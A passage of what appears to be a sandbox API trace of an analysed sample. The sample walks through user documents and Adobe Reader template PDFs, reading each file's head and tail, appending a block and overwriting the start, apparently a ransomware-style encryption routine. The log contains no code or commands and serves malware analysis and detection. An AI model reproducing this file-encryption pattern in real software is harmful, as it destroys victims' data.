lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.076] CloseHandle (hObject=0x1bc) returned 1 [0062.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\AFeQs.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\afeqs.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.079] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.079] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xaf3f [0062.079] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.079] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.079] ReleaseMutex (hMutex=0x168) returned 1 [0062.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AFeQs.xls", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AFeQs.xls", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AFeQs.xls", lpUsedDefaultChar=0x0) returned 9 [0062.079] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0062.081] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9f3f [0062.081] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.081] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9f3f [0062.081] WriteFile (in: hFile=0x1bc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.083] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.083] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.083] CloseHandle (hObject=0x1bc) returned 1 [0062.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xaMADQzHGAzmXsZtl9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xamadqzhgazmxsztl9.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.085] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.085] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x15c0e [0062.085] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.085] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.085] ReleaseMutex (hMutex=0x168) returned 1 [0062.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xaMADQzHGAzmXsZtl9.docx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0062.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xaMADQzHGAzmXsZtl9.docx", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xaMADQzHGAzmXsZtl9.docx", lpUsedDefaultChar=0x0) returned 23 [0062.086] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0062.087] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x14c0e [0062.087] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.087] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x14c0e [0062.087] WriteFile (in: hFile=0x1bc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.088] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.088] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.089] CloseHandle (hObject=0x1bc) returned 1 [0062.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\GaylEHQJ5Dn.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\gaylehqj5dn.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.101] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.101] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xdd03 [0062.101] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.101] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.101] ReleaseMutex (hMutex=0x168) returned 1 [0062.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GaylEHQJ5Dn.odt", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0062.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GaylEHQJ5Dn.odt", cchWideChar=15, lpMultiByteStr=0x1f7328c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GaylEHQJ5Dn.odt", lpUsedDefaultChar=0x0) returned 15 [0062.101] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0062.400] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xcd03 [0062.401] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.401] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xcd03 [0062.401] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.402] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.402] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.402] CloseHandle (hObject=0x1bc) returned 1 [0062.404] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.405] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.405] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x207b0 [0062.405] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.405] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.405] ReleaseMutex (hMutex=0x168) returned 1 [0062.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0062.405] ReadFile (in: hFile=0x1bc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0062.409] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1f7b0 [0062.409] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.410] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1f7b0 [0062.410] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.411] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.411] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.411] CloseHandle (hObject=0x1bc) returned 1 [0062.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.414] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.414] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x101bc [0062.414] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.414] ReleaseMutex (hMutex=0x168) returned 1 [0062.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0062.414] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0062.417] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf1bc [0062.417] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.417] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf1bc [0062.418] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.418] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.418] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.418] CloseHandle (hObject=0x1bc) returned 1 [0062.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.421] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.421] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3e95 [0062.421] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.421] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.421] ReleaseMutex (hMutex=0x168) returned 1 [0062.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0062.421] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.425] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2e95 [0062.425] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.425] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2e95 [0062.425] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.426] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.426] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ec5568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.426] CloseHandle (hObject=0x1bc) returned 1 [0062.648] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.649] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.649] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5416 [0062.649] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.649] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.649] ReleaseMutex (hMutex=0x168) returned 1 [0062.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0062.650] ReadFile (in: hFile=0x1bc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.651] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4416 [0062.651] ReadFile (in: hFile=0x1bc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.652] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4416 [0062.652] WriteFile (in: hFile=0x1bc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.653] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.653] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ec3568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec3568*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.653] CloseHandle (hObject=0x1bc) returned 1 [0062.655] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.655] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.655] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x10f09 [0062.655] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.656] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.656] ReleaseMutex (hMutex=0x168) returned 1 [0062.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 